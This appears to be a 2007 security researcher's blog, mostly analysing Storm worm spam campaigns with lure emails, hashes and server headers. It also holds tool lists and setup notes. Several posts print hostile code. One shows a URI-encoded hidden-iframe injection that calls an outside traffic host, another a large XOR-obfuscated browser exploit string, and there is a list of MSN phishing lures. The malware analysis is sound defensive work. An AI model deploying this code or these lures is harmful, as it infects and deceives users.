Sunday, November 04, 2007

Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard

These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone with modem. If you don't know how, read the forum post that got me this far. The forum works great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.

Username: PHONE_NUMBER@vzw3.com (not sure how important this is, I've done it with the BlackBerry Internet Server username also)
Password: vzw
Telephone: #777

Advanced button
Vendor: Generic
Model: Dialup Device
(Leave the rest as defaults)

Friday, November 02, 2007

Ruby snippet for URI decoding

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stephen's modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Which this:
ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

Returns this:
"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

Wednesday, October 24, 2007

VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)

Note to self:
sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server

I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.

Thursday, October 18, 2007

Play that funky mus...stock spam, Storm

Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".

Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.

coolringtone.mp3
firstdance.mp3

Wednesday, October 17, 2007

Because there is no patch...

...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab and antivirus companies but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.

Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!

Below are samples of the e-mails, screenshots and the javascript exploits.

Subject:re: krackin is released
Body:New Sharing network goes live. Check out Krackin here.
http://xx.90.44.73/


Subject:re: krackin is online
Body:Ok, last time I am sending you this linkman. LOL write it down or
soothing. This is krackin. http://xx.74.85.128/


Subject:man here is the link
Body:man here is the next huge sharing network. It is friggin awesome. Check
it out. http://xx.37.24.109/



Here's a text file of the javascript exploit code. Handle with care!

Thursday, October 11, 2007

Kitties say Storm is better than catnip!

Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.

Subject: You have just received an ecard.
Body: Check out the original Crazy Cat Card. It is too funny for words.
http://75.4.70.217/


Subject: Check out your ecard.
Body: Click here to view your laughing kitty card online. http://74.138.11.91/


Subject: You've got a greeting just for you!
Body: Please click here to view your Crazy Kitty Card Online.
http://99.162.220.182/

Here's a screenshot of the page:

After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found the the original file came from http://www.superlaugh.com/1/catnip.swf Both files were the same size but MD5's did not match.

movie 'catnip.swf' {
// flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
frame 1 {
ifFrameLoaded (4) {
gotoAndPlay(3);
}
}
frame 2 {
gotoAndPlay(1);
}
movieClip 5 {
}
button 7 {
on (release) {
getURL('http://www.superlaugh.com', '_top');
}
}
movieClip 14 {
}
frame 125 {
gotoAndPlay(3);
}
}

The links on the page all go to SuperLaugh.exe which was caught by 70% of scan engines on Virus Total. Obfuscated Javascript was found at the bottom just like some previous versions. It looked to be the same exploits that have been being used on and off since I first started looking into Storm about a month or two ago.

Also, all the images, including the kitty Flash file, were sourced from the "/img" directory but it did not allow browsing of directories.

Tuesday, September 25, 2007

Links for AITP and FAEDS presentations

Thank all of you for attending my presentation. If you have any questions, please don't hesitate to e-mail me. Here are links to many of the things I talked about and demonstrated along with several that I didn't have time to get to.

My Websites
-----------------------------------
Personal Blog
http://www.johnhsawyer.com

Dark Reading Blog
http://www.darkreading.com/blog.asp?blog_sectionid=447

UF IT Security Team
http://infosec.ufl.edu

Malware Analysis and Sandboxes
-----------------------------------
VirusTotal (submit files for analysis)
http://www.virustotal.com/

CWSandbox - Behavior-based Malware Analysis
http://www.cwsandbox.org/

Anubis: Analyzing Unknown Binaries
http://analysis.seclab.tuwien.ac.at/index.php

Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en

Mandiant Red Curtain
http://www.mandiant.com/mrc

PEiD
http://www.secretashell.com/codomain/peid/

pefile (for you Python programmers)
http://dkbza.org/pefile.html

Firefox Extensions and SpiderMonkey
-----------------------------------
NoScript
http://noscript.net/

User Agent Switcher
http://chrispederick.com/work/web-developer/

WebDeveloper
http://chrispederick.com/work/web-developer/

SpiderMonkey
http://www.mozilla.org/js/spidermonkey/

Incident Response Tools (& more)
-----------------------------------
Sysinternals
http://www.microsoft.com/technet/sysinternals/default.mspx
(autoruns, tcpview, filemon, regmon, process moniopenports, tor, process explorer, pstools)
Sysinternals Suite (all tools in one download)
http://www.microsoft.com/technet/sysinternals/Utilities/SysinternalsSuite.mspx

DiamondCS
http://www.diamondcs.com.au/consoletools.php
(cmdline, openports)

Wireshark - sniffer and protocol analzer (formerly Ethereal)
http://www.wireshark.org

Helix - CD designed for incident response and forensics (Linux & Windows tools)
http://www.e-fense.com/helix/

Some Security Blogs
-----------------------------------
SANS Internet Storm Center
http://isc.sans.org

Windows Incident Response (Harlan Carvey) - event logs, registry and memory analysis & more
http://windowsir.blogspot.com/

int for(ensic){blog;} (Andreas Schuster) - event logs and memory analysis
http://computer.forensikblog.de/en/

Centralizing Windows Event Logs
-----------------------------------
Series of Posts on DarkReading about logs:
Log Central
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132446
How to Centralize Windows Event Logs (links to Snare and Lasso)
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132709
Watch Out for That Log!
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=133005

Miscellaneous Links
-----------------------------------
Metasploit Framework
http://framework.metasploit.com/

VMware (Workstation for Linux & Windows, Fusion for Mac, Server and Player are FREE )
http://www.vmware.com

Thursday, September 20, 2007

Process memory dumping tools

This is from a post I had over at ForenisFocus.com. I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post. So, I stuck it here for my own future reference.


Everyone already knows about dd for Windows from George M. Garner so I won't discuss it any further. Until, the tools like those developed in the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them.

There is some promising research from Mariusz Burdach who just spoke at BlackHat Federal 2006 on "Finding Digital Evidence in Physical Memory." His website is located at http://forensic.seccure.net/ but his documentation memory forensics is more up-to-date on the BlackHat Media Archives page. The tools/docs archive even has the Windows version of wmft.exe which isn't on his webpage yet (just the linux version of wmft is there).

Memdump was mentioned but there are at least two different versions for Windows that I know of. The one mentioned previously by APsoft and another from the Metasploit project.

APsoft's memdump will do any or all of memory.

MEMDUMP/386 for DOS Version 2.00 - Release 15-Jun-2005
(C) Copyright 1993-2005 by APSoft (http://www.tssc.de)
All rights reserved. Disassembly or decompilation prohibited.

This program dumps or copy any part of 4GB memory address space of your system.
For proper access to hardware registers, memory can be read with BYTE, WORD or
Double WORD granularity.

Syntax: MEMDUMP [/H|?]
[/D[B|W|D][:Address[,Length]]]
[/F:filename|none]
[/B:filename]

where: /H - Print this text
/D[B|W|D][:Address[,Length]]
- Dump <Length> number of memory bytes from specified
linear <Address> as bytes (DB), words (DW) or
double words (DD) correspondingly.
/F:filename - Output file for the dump (Default: console)
Use /F:none to completely suppress dump
/B:filename - Output file for the binary contents of memory

Notes: Both 'Address' and 'Length' can be expressed in hexadecimal format
with '0x' prefix. The 'Length' field can be also expressed in decimal
Examples:

MEMDUMP /DW:0x100000,0x100000 /F:2ndMB.dmp - dump second MB to file
MEMDUMP /DB:0x100000,128 - dump 128 Bytes to CON:
MEMDUMP /D:0,0x100 /F:none /B:IntTB.bin - copy INT table to file

If dump or binary file exists, MEMDUMP unconditionally overrides it.

If you are using WORD or DWORD access 'Length' parameter should be
multiple of 2 or 4 correspondingly.

Please remember that if the memory manager (such as EMM386.EXE) is
loaded, MEMDUMP will read linear address rather as physical address.


There is almost no help for the Metasploit memdump. It dumps specific processes by giving it a PID and creates quite a few files that are to be analyzed with msfpescan. The file names looks to be based on the section of memory it is pulled from. Msfpescan is crashing on my Mac OS X box right now so can't show you the output but here is the syntax and sample of memdump running.

C:\>y:\memdump.exe
Usage: y:\memdump.exe pid [dump directory]

C:\>y:\memdump.exe 2796
[*] Creating dump directory...2796
[*] Attaching to 2796...
[*] Dumping segments...
[*] Dump completed successfully, 49 segments.

Then, there is pmdump that also dumps processes.


pmdump 1.2 - (c) 2002, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/pmdump/

Usage: pmdump <pid> <filename>
- dumps the process memory contents to a file

pmdump -list
- lists all running processes and their PID's


Microsoft has several versions of userdump but I think the latest is version 8.0 and is less than a month old. As with Metasploits memdump, there is another tool that can read the dumped output. Dumpcheck is that tool and is part of the debugging tools package. For it to be most useful, you need the symbols, also.


User Mode Process Dumper (Version 8.0.2826.0)
Copyright (c) 1999-2005 Microsoft Corp. All rights reserved.

userdump -p
Displays a list of running processes and process IDs.

userdump [-k] <ProcessSpec> [<TargetDumpFile>]
Dumps one process or processes that share an image binary file name.

-k optionally causes processes to be killed after being dumped.

<ProcessSpec> is a decimal or 0x-prefixed hex process ID, or the
base name and extension (no path) of the image file used to create
a process.

<TargetDumpFile> is a legal Win32 file specification. If not specified,
dump files are generated in the current directory using a name
based on the image file name.

userdump -m [-k] <ProcessSpec> [<ProcessSpec>...] [-d <TargetDumpPath>]
Same as above, except dumps multiple processes.

-d <TargetDumpPath> supplies the directory where the dumps will go.
The default is the current directory.

userdump -g [-k] [-d <TargetDumpPath>]
Similar to above, except dumps Win32 GUI apps that appear hang.

userdump -I [-d <TargetDumpPath>]
To change just in time debugger to UserDump.
This command will not actually start UserDump.
If you don't setup userdump, please copy userdump.exe to %windir%\system32.

-d <TargetDumpPath> supplies the directory where the dumps will go.
The default is a current directory of the target process.

That's it that I can think of for now. I will probably remember the other one or two tonight. Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area.

Tuesday, September 18, 2007

MSN bot making the rounds

It has handy commands like main.wget, main.remove, msn.url, msn.self and msn.stop.

If you get one of the following and it includes a link to a site like photobucket.com or similar, don't click it. This came straight from a txt file an IRC bot was using as its source of deceptive messages being sent to MSN users.

This picture isnt you... right?
Wow i think i found your pic on myspace!
hey did i ever show you this picture of me?
can i up some of these pics of ya to my myspace profile?
you care if i put this pictuer of you in my new album?
sry about the messup i fixed the pic! Try it one more time plz
Can i put this pic of you into my new myspace album?
this looks like you lol
haha this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone
Wanna see my pics before i send em to facebook?
do you think this picture is too kinky for Myspace?
I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.
Have you seen me Naked Yet :D
ok I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol
hey you got a myspace album? anyways heres my new myspace album :) accept k?
do I look dumb in this picture? I want to put it on myspace.

Saturday, September 15, 2007

Storm brings "games" that pack a punch

Today, Storm includes e-mails about free games available. The e-mails are resorting back to including URLs to IP addresses and not a domain like the most recent NFL messages. The web page includes pictures of all sorts of games and links to "ArcadeWorld.exe".



The Storm worm folks are also resorting to including exploit code. My guess is they just didn't get the number of infections they were hoping to with just including links to the *.exe with the NFL version.
Here's a screenshot of the obfuscated javascript.



This is after the first round of deobfuscating the javascript using SpiderMonkey. See how there's still more to analyze. The overly long filename for the WMV file looks like it is targeting MS06-006.



The do/while loop creates a string of 16,777,216 A's that gets the shellcode appended to the end.



Subject: Quick, grab this
Body: Click here to get over 1000 games for free http://xxx.0.188.5/

Subject: Quick, grab this
Body: Stop paying for games; we have over 1000 games for free online http://xx.57.250.77/

Subject: Thousands of hours of fun, for free
Body: Go http://xx.203.41.160/

Subject: Stop paying for games
Body: 1000 Online Free games, take a look http://xx.38.52.177/

Subject: The internet just got better
Body: Look http://xxx.54.195.27/

Thursday, September 13, 2007

freeNFLtracker.com now in use by Storm worm

Messages just started pouring in with links to http://freeNFLtracker.com/ instead of individual IP addresses. If you can blackhole the DNS, do so immediately to prevent users from being able to resolve the domain.

There is still no exploit code in the webpage, but it probably won't be long before it is included. I'm guessing the current page is so effective at getting users to click and run that there isn't a need for automatic exploitation.

Subject: Are you ready for football season?
Body: Want to know all the stats all the time this season? Get your free NFL Season Tracker!
http://freeNFLtracker.com/

Subject: Are you ready for football season?
Body: Are you ready for tonight's game? How about the whole season? Do you have your NFL Season Tracker?
http://freeNFLtracker.com/

Subject: The season has started
Body: Know every player and every stat, with this years Real-time NFL Tracker.
http://freeNFLtracker.com/

Here's the registrar info for FREENFLTRACKER.COM. For obvious reasons, they're using a privacy service to block the real registrant info.

Registration Service Provided By: LOMTI INC.
Contact: +351.3456712

Domain Name: FREENFLTRACKER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 65
All Postal Mails Rejected, visit Privacyprotect.org
Monster
null,2680 AB
NL
Tel. +45.36946676

Creation Date: 13-Sep-2007
Expiration Date: 13-Sep-2008

Domain servers in listed order:
ns13.freenfltracker.com
ns12.freenfltracker.com
ns11.freenfltracker.com
ns10.freenfltracker.com
ns9.freenfltracker.com
ns8.freenfltracker.com
ns7.freenfltracker.com
ns6.freenfltracker.com
ns5.freenfltracker.com
ns4.freenfltracker.com
ns3.freenfltracker.com
ns2.freenfltracker.com

Saturday, September 08, 2007

Go! Fight! Storm..uhm..Score!

Just in time for football season, Storm worm is now targeting football fans with a free online game tracker. The page is much more elaborate than any of the others so far with more graphics, a table and an image map. Every link on the page goes to "tracker.exe" and there is no obfuscated javascript or exploit code in the page itself. It is solely relying on users to click and run the "tracker.exe".



Subject: FOOTBALL! Are You ready?
Body: Football Season Is Finally here!
Never miss a game again, and know all the stats.
Get you data online everyday from our free game tracker:
http://xx.179.106.14/

Subject: Free NFL Game Tracker
Body: Are you ready for some football?
Let us keep you on top of every game everyday.
Never be in the dark again with this online game tracker:
http://xx.8.83.172/

Subject: Do you have your NFL Game List?
Body: Football is back, Life may resume again!
We can keep you on top of every single game this season.
Get all your game info daily from our online game tracker:
http://xx.248.200.167/

Subject: Are you ready for some football?
Body: Life as we know it is back, NFL season is open.
Let us keep you on top of every game everyday.
Get all your game info daily from our online game tracker:
http://xx.211.219.222/

Thursday, September 06, 2007

sTORm preying on file sharers

This came in at 7:02am this morning after about two days of nothing new from Storm. Now they are promoting Tor for file sharers to protect themselves from "Big Brother." Tor anonymizes online activity by encrypting and tunneling network traffic through random Tor exit nodes all around the world. It is nice to see Tor getting some recognition, but hopefully, it won't lead to too many new infections.

Here's a copy of the e-mail and a screenshot of the page.

Subject: Big brother is watching you.
Body: Do you trade files online? Then they will come after you. The news is full of articles of lawsuits by the RIAA. This program protects your online identity. Save yourself from an attack and use this free software now. Download Tor

Tuesday, September 04, 2007

A Stormy Labor Day celebration

I did have a stormy Labor Day weekend in Hilton Head over the long holiday weekend, but my Inbox also received new copies of Storm worm hoping to trick users into infecting themselves. They either tell users they have a new e-card or there is a holiday greeting card waiting for them. The host with the malicious content has a cute Labor Day picture that links to "labor.exe"

All the same nasty obfuscated Javascript exploit code is still there and doesn't appear to have changed from what we were seeing last week.

Subject: Happy Labor Day
Body: Someone has sent you an E-Card. To view it, follow this link: http://ecards.com/funcard/edelivery?xz2dl2ifbi6r80hzk

Subject: The Big Labor Day Weekend
Body: Here is the link to view your holiday greeting online: http://hallmark.com/ecards/labor1?j7hesyq65ubntze680a1p67969wt2

Subject: Your friend has sent you a card.
Body: Click here to pick up your greeting card: http://netcards.com/cards/edelivery?p9n2q90enz4afj0

I do most of my javascript deobfuscation using technique #4 as detailed by Daniel Wesemann on the SANS Internet Storm Center site (http://isc.sans.org). I'll probably go over how I do it in a little more detail in an upcoming post.

Thursday, August 30, 2007

Quick template mod

I had to mod the Blogger template because it was feeling a bit restrictive and making the long posts scroll. Personally, I read blogs through Google Reader but there is still a lot of people that go straight to the blog site so this should make it easier for all of you.

Also, I was thinking of changing the title of the blog. Right now, it is "John H. Sawyer" which is because I'm too lazy to have come up with an original one. My DarkReading blog is called "Evil Bits" which Ben told me yesterday should be called "Naughty Bits." ;-) Thanks, Ben. Any ideas for blog titles?

Wednesday, August 29, 2007

Rock bands get a little Storm love

Whether that is good or bad, I'm sure it's going to make some college students and teens want to click on it. Two messages made it through this morning (see below). Today's Storm executable is "codec.exe". Even though the Storm worm host is serving up "codec.exe" as the current trick to get users to install (if they don't get owned by the embedded exploits first), it still usually hosts other EXE's based on previously seen names like "applet.exe", "video.exe", etc. The obfuscated javascript and exploits look to be the same as yesterday.

On this host, I was able to pull both "video.exe" and "codec.exe" but not "applet.exe"--at least, not a Storm binary. (I didn't bother trying the other half dozen filenames used in the past).

Here's there file sizes, md5's and content of the page returned by the "applet.exe" request.
140367 Aug 29 10:52 codec.exe
140367 Aug 29 10:52 video.exe
529 Aug 29 10:52 applet.exe

MD5 (applet.exe) = 37fe7efbebfe417c25a92f76d163ea3b
MD5 (codec.exe) = 1ef03f4830c530799c57d67e1ccadc59
MD5 (video.exe) = 1ef03f4830c530799c57d67e1ccadc59

applet.exe: HTML document text
codec.exe: MS-DOS executable (EXE), OS/2 or MS Windows
video.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Page content returned from "applet.exe" request.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.17</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->

And, here's the content of the new e-mails.
Subject: Hot new video
Body: Foo Fighters just made a video you have got to see.

Be the first to see it. Click on the link to pull it off my server:
http://xx.25.176.66/
and

Subject: this video rockx
Body: Velvet Revolver
Check it out first. Go here for the video: http://xx.106.206.111/

Just got this one...

Subject: this video is not out yet
Body: Fat Boy just filmed their new video.

Be the first to see it. Click here to download it: http://xxx.211.45.200/

Tuesday, August 28, 2007

Storm takes one step back, six steps forward

I was getting bummed since I hadn't seen any Storm worm infection letters since yesterday around 3pm, but Storm worm loves me and would never leave me hanging. This just came in.

Subject: Helps us out and let us say thanks
Body: We are looking for Consumer opinions of our new software Home Reno Planner

This beta testing will enable us to fine tune the software for public release. A free copy of the program plus free updates will be yours for helping out.

Download the software, See What you think, and Email us your thoughts. If you would like to help us with this no obligation Beta test, follow this link to our secure download server: http://xx.183.196.147/setup.exe

Where is the obfuscated link to the IP? I was surprised to see the raw IP listed along with a link directly to an EXE. It is definitely Storm worm hosting the malware. A quick download and check of the server header shows:

HTTP/1.1 200 OK
Server: nginx/0.5.17
Date: Tue, 28 Aug 2007 14:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 140367
Connection: close
Accept-Ranges: bytes

Bringing up http://xx.183.196.147/ without the "setup.exe" shows it is also doubling as a StormTube host complete with obfuscated Javascript that contains a shotgun approach to exploiting the web browser. A cursory glance show about a half dozen exploits that may be for IE WebViewFolderIcon setSlice(), WinZip WebViewFolderIcon, Yahoo WebCam, Microsoft 'msdds.dll' COM Object, QuickTime and AdobeWScriptShell.
Since including code in the body of the blog is a pain, here's the files if you want to play with them.

Wish List: PE Posters

Ero Carrera has created a CafePress store to sell poster-sized versions of his "Portable Executable Format: A File Walkthrough" and "Portable Executable Format."

How hot are these? Check out his blog post about it for more info.

Thursday, August 23, 2007

The Ever Changing Storm

Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they learned that users might not click on an IP address so they've obfuscated it with HTML.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

Or

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or...there's just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their header:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails don't have any mail client info. The Storm worm host directed to by the e-mail does have some obfuscated javascript with exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\x